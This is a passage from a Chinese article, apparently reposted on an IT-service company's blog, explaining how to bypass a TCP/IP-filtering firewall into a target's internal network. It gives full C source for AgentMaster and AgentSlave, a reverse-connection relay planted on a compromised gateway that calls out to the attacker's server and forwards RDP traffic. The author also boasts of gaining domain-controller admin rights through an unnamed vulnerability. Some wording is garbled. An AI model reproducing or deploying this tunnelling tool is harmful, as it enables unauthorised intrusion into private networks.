如何突破TCP-IP过滤防火墙进入内网

  12345[注意：是反弹端口，TCP/IP过滤也拿他没措施]
  〈3〉我自己192.168.0.2用TermClient连接到自己的服务器202.1.1.1:3389
  〈4〉仇人网关上的AgentSlave连接到自己本身在内网的IP==〉192.168.1.1:3389
  〈5〉数据通道就创建好啦。两个代理老实的为我们转发数据，呵呵。当我们连接自己服务器的3389，实在出来的是仇人内网的某台机器，呵呵。
  后来发明仇人的主域控制器是192.168.1.4，经过前面与他网关创建的连接，利用一个漏洞轻易的获得主域的admin权限，呵呵。他可能以为主域在内网，网关又做了TCP/IP过滤，打击者没有措施进入。我只要把AgentSlave设置为连接192.168.1.4:3389，以后就可以间接连接他的主域控制器啦，不外在网关登陆也一样。
  程序代码如下[程序中所用到的TCPDataRedird.c曾经贴在第一部门，那个文件做数据转发，通用的：
  /指导指导指导指导指导指导指导指导指导指导指导指导指导
  Module Name:AgentMaster.c
  Date:2001/4/16
  CopyRight（c） eyas
  说明：scoket代理主控端，卖力监听两个TCP socket,等候打击者和AgentSlave来连接，两个
  scoket都连接成功后，开端转发数据
  sock[0]是client==〉sock[0] sock[1]是target==〉sock[1]
  指导指导指导指导指导指导指导指导指导指导指导指导指导/
  #include 〈stdio.h〉
  #include 〈winsock2.h〉
  #include "TCPDataRedird.c"
  #pragma comment（lib,"ws2_32.lib"）
  #define TargetPort 3389//假装的target的监听端口
  #define LocalPort 12345//等候AgentSlave来connect的端口
  int main（）
  {
  WSADATA wsd;
  SOCKET s3389=INVALID_SOCKET,//本机监听的socket，等候打击者连接
  s1981=INVALID_SOCKET,//监听的socket,等候AgentSlave来连接
  sock[2]=;
  struct sockaddr_in Local3389,Local1981,Attack,Slave;
  int iAddrSize;
  HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
  hThreadT2C=NULL;//T2C=TargetToClient
  DWORD dwThreadID;
  __try
  {
  //load winsock library
  if（WSAStartup（MAKEWORD（2,2）,&wsd）!=0）
  {
  printf（"\nWSAStartup（） failed:%d",GetLastError（））;
  __leave;
  }
  //create socket
  s3389=socket（AF_INET,SOCK_STREAM,IPPROTO_IP）;
  if（s3389==INVALID_SOCKET）
  {
  printf（"\nsocket（） failed:%d",GetLastError（））;
  __leave;
  }
  //create socket
  s1981=socket（AF_INET,SOCK_STREAM,IPPROTO_IP）;
  if（s1981==INVALID_SOCKET）
  {
  printf（"\nsocket（） failed:%d",GetLastError（））;
  __leave;
  }
  //fill the struct
  Local3389.sin_addr.s_addr=htonl（INADDR_ANY）;
  Local3389.sin_family=AF_INET;
  Local3389.sin_port=htons（TargetPort）;
  Local1981.sin_addr.s_addr=htonl（INADDR_ANY）;
  Local1981.sin_family=AF_INET;
  Local1981.sin_port=htons（LocalPort）;
  //bind s3389 for attacker
  if（bind（s3389,（struct sockaddr
  *）&Local3389,sizeof（Local3389））==SOCKET_ERROR）
  {
  printf（"\nbind（） failed:%d",GetLastError（））;
  __leave;
  }
  //listen for attacker to connect
  if（listen（s3389,1）==SOCKET_ERROR）
  {
  printf（"\nlisten（） failed:%d",GetLastError（））;
  __leave;
  }
  //bind s1981 for AgentSlave
  if（bind（s1981,（struct sockaddr
  *）&Local1981,sizeof（Local1981））==SOCKET_ERROR）
  {
  printf（"\nbind（） failed:%d",GetLastError（））;
  __leave;
  }
  //listen for AgentSlave to connect
  if（listen（s1981,1）==SOCKET_ERROR）
  {
  printf（"\nlisten（） failed:%d",GetLastError（））;
  __leave;
  }
  //socket循环
  while（1）
  {
  //wait for AgentSlave to connect
  iAddrSize=sizeof（Slave）;
  sock[1]=accept（s1981,（struct sockaddr *）&Slave,&iAddrSize）;
  if（sock[1]==INVALID_SOCKET）
  {
  printf（"\naccept（） failed:%d",GetLastError（））;
  break;
  }
  printf（"\nAccept AgentSlave==〉%s:%d",inet_ntoa（Slave.sin_addr）,
  ntohs（Slave.sin_port））;
  //wait for Attacker to connect
  iAddrSize=sizeof（Attack）;
  sock[0]=accept（s3389,（struct sockaddr *）&Attack,&iAddrSize）;
  if（sock[0]==INVALID_SOCKET）
  {
  printf（"\naccept（） failed:%d",GetLastError（））;
  break;
  }
  printf（"\nAccept Attacker==〉%s:%d",inet_ntoa（Attack.sin_addr）,
  ntohs（Attack.sin_port））;
  //创建两个线程进行数据转发
  hThreadC2T=CreateThread（NULL,0,TCPDataC2T,（LPVOID）sock,0,&dwThreadID）;
  hThreadT2C=CreateThread（NULL,0,TCPDataT2C,（LPVOID）sock,0,&dwThreadID）;
  //等候两个线程结束
  WaitForSingleObject（hThreadC2T,INFINITE）;
  CloseHandle（hThreadC2T）;
  CloseHandle（hThreadT2C）;
  closesocket（sock[0]）;
  closesocket（sock[1]）;
  }//end of socket while
  }//end of try
  __finally
  {
  //clean all
  if（s3389!=INVALID_SOCKET） closesocket（s3389）;
  if（s1981!=INVALID_SOCKET） closesocket（s1981）;
  if（sock[0]!=INVALID_SOCKET） closesocket（sock[0]）;
  if（sock[1]!=INVALID_SOCKET） closesocket（sock[1]）;
  if（hThreadC2T!=NULL） CloseHandle（hThreadC2T）;
  if（hThreadT2C!=NULL） CloseHandle（hThreadT2C）;
  WSACleanup（）;
  }
  return 0;
  }
  /指导指导指导指导指导指导指导指导指导指导指导指导指导*****
  Module:AgentSlave.c
  Date:2001/4/17
  Copyright（c）eyas
  HomePage:www.patching.net
  说明：这个程序卖力连接终极目标，连接主控端，然后转发数据
  这里连接到AgenrMaster的socket相称与sClient==〉sock[0]，
  连接到终极目标的socoket是sTarget==〉sock[1]
  指导指导指导指导指导指导指导指导指导指导指导指导指导*****/
  #include 〈stdio.h〉
  #include 〈winsock2.h〉
  #include "TCPDataRedird.c"
  #pragma comment（lib,"ws2_32.lib"）
  #define TargetIP "192.168.1.3"
  #define TargetPort （int）3389
  #define AgentMasterIP "202.1.1.1"
  #define AgentMasterPort （int）12345
  int main（）
  {
  WSADATA wsd;
  SOCKET sock[2]=;
  struct sockaddr_in Master,Target;
  HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
  hThreadT2C=NULL;//T2C=TargetToClient
  DWORD dwThreadID;
  __try
  {
  //load winsock library
  if（WSAStartup（MAKEWORD（2,2）,&wsd）!=0）
  {
  printf（"\nWSAStartup（） failed:%d",GetLastError（））;
  __leave;
  }
  //循环
  while（1）
  {
  //create client socket
  sock[0]=socket（AF_INET,SOCK_STREAM,IPPROTO_IP）;
  if（sock[0]==INVALID_SOCKET）
  {
  printf（"\nsocket（） failed:%d",GetLastError（））;
  __leave;
  }
  //create target socket
  sock[1]=socket（AF_INET,SOCK_STREAM,IPPROTO_IP）;
  if（sock[1]==INVALID_SOCKET）
  {
  printf（"\nsocket（） failed:%d",GetLastError（））;
  __leave;
  }
  //fill struct
  Target.sin_family=AF_INET;
  Target.sin_addr.s_addr=inet_addr（TargetIP）;
  Target.sin_port=htons（TargetPort）;
  Master.sin_family=AF_INET;
  Master.sin_addr.s_addr=inet_addr（AgentMasterIP）;
  Master.sin_port=htons（AgentMasterPort）;
  //connect to AgentMaster
  if（connect（sock[0],（struct sockaddr
  *）&Master,sizeof（Master））==SOCKET_ERROR）
  {
  //连接失败后，等候一会儿再连
  printf（"\nconnect（） to master failed:%d",GetLastError（））;
  closesocket（sock[0]）;
  closesocket（sock[1]）;
  Sleep（5000）;
  continue;
  }
  printf（"\nconnect to %s %d success!",AgentMasterIP,AgentMasterPort）;
  //connect to target
  if（connect（sock[1],（struct sockaddr
  *）&Target,sizeof（Target））==SOCKET_ERROR）
  {
  printf（"\nconnect（） to target failed:%d",GetLastError（））;
  __leave;
  }
  printf（"\nconnect to %s %d success!",TargetIP,TargetPort）;
  //创建两个线程进行数据转发
  hThreadC2T=CreateThread（NULL,0,TCPDataC2T,（LPVOID）sock,0,&dwThreadID）;
  hThreadT2C=CreateThread（NULL,0,TCPDataT2C,（LPVOID）sock,0,&dwThreadID）;
  //等候两个线程结束
  WaitForSingleObject（hThreadC2T,INFINITE）;
  CloseHandle（hThreadC2T）;
  CloseHandle（hThreadT2C）;
  closesocket（sock[0]）;
  closesocket（sock[1]）;
  }//end of while
  }//end of try
  __finally
  {
  if（sock[0]!=INVALID_SOCKET） closesocket（sock[0]）;
  if（sock[1]!=INVALID_SOCKET） closesocket（sock[1]）;
  if（hThreadC2T!=NULL） CloseHandle（hThreadC2T）;
  if（hThreadT2C!=NULL） CloseHandle（hThreadT2C）;
  WSACleanup（）;
  }
  return 0;
  }
  好了，至此就完了
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:

评论加载中... 内容： 评论者： 验证码：